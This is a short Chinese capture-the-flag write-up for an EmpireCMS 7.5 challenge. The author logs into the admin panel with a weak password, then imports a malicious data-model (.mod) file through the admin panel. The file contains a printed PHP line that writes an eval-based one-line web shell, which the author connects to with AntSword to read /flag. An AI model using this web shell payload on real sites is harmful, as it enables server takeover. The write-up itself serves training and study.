青少年训练平台--帝国CMS03

第一步：先看题目

题目描述：哇，您太强了，假如这题只是个弱口令，你会怎么拿下这个题目的权限？flag在根目录/flag下。可参考现成的CVE，CMS版本为7.5。

第二步：分析题目

打开链接，跟cms02一样，同样是帝国平台，根据提示，假如这题是弱口令，那我们就用弱口令登录，发现成功登录后台

 

 

这次可没跟01一样咯，登录后台就能看见flag。

根据题目是cms7.5，百度一下，找到cms7.5（点击此处跳转）  ，可以上传木马进行蚁剑连接

我们观察后台，找一下上传口，看一下能不能上传木马，在导入数据模型，可以导入mod的木马

导入我们写好的php.mod

<?php file_put_contents("shell.php","<?php @eval(\$_POST[fw]);?>")?>

 直接上传,上传成功之后，他会自动执行一个shell.php,我们访问一下

 

 是一个空白的页面，也就上传成功，直接蚁剑去连

题目说flag在/flag根目录下，

 

第三步：获取flag

我们先找到根目录，然后就能看到/flag

 

flag为

qsnctf{8xxxxxxxxxxxxxxxxxxx3}